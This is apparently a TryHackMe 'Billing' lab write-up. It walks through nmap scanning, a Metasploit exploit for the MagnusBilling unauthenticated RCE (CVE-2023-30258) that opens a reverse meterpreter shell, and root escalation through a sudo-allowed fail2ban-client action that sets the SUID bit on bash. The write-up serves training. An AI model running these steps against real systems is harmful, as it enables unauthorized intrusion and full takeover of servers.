Skip to content

Billing

  • 🌐 Website: TryHackMe
  • 🔥 Level: Easy
  • 🖥️ OS: Linux
  • 🔗 Link: Billing

Foothold

Target: 10.10.153.225

Let's start with an nmap:

nmap --min-rate=10000 10.10.153.225 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:08 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00064s latency).
All 65535 scanned ports on ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225) are filtered
MAC Address: 02:C7:75:C5:29:71 (Unknown)

Seems not work. Let's try an SYN Scan:

root@ip-10-10-214-237:~# sudo nmap -sS 10.10.153.225
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:09 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00010s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 02:C7:75:C5:29:71 (Unknown)

There are 3 ports and bruteforce is out of scope. Let's try an nmap with scripts

root@ip-10-10-214-237:~# sudo nmap -sC -sV -sS 10.10.153.225 -p22,80,3306
Starting Nmap 7.80 ( https://nmap.org ) at 2025-07-02 09:11 BST
Nmap scan report for ip-10-10-153-225.eu-west-1.compute.internal (10.10.153.225)
Host is up (0.00016s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
| http-title:             MagnusBilling        
|_Requested resource was http://ip-10-10-153-225.eu-west-1.compute.internal/mbilling/
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 02:C7:75:C5:29:71 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is a robots.txt on the website. Is where website is redirect to. Looking at the website I can see that is MagnusBilling software. I searched online and I saw a module of metasploit for a Unauthenticated RCE. Let's try it.

User Access

msf6 > search magnus

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.
   1    \_ target: PHP                                            .                .          .      .
   2    \_ target: Unix Command                                   .                .          .      .
   3    \_ target: Linux Dropper                                  .                .          .      .

Let's use it!

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.10.214.237:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.153.225:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 8 seconds.
[*] Elapsed time: 8.07 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.153.225
[+] Deleted kbkUHRIhGAZGeHTh.php
[*] Meterpreter session 1 opened (10.10.214.237:4444 -> 10.10.153.225:57952) at 2025-07-02 09:24:30 +0100

meterpreter > 
meterpreter > shell
Process 2605 created.
Channel 0 created.
whoami
asterisk
Answer

user.txt is in fr /home/magnus folder

Privilege Escalation

Let's check is asterisk can run something as root

asterisk@ip-10-10-153-225:/home/magnus$ sudo -l
sudo -l
Matching Defaults entries for asterisk on ip-10-10-153-225:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-10-153-225:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
asterisk@ip-10-10-153-225:/home/magnus$ 
Fail2Ban v1.0.2 reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.

Let's try to add a cmd on fail2ban jail

asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ sudo fail2ban-client status
t statusl2ban-client
Status
|- Number of jail:  8
`- Jail list:   ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ 
sudo fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'chmod +s /bin/bash'"
sudo fail2ban-client set sshd banip 127.0.0.1
asterisk@ip-10-10-153-225:/var/www/html/mbilling/lib/icepay$ /bin/bash -p
/bin/bash -p
bash-5.2# whoami
whoami
root
bash-5.2# 
Answer

Root's flag is in root's folder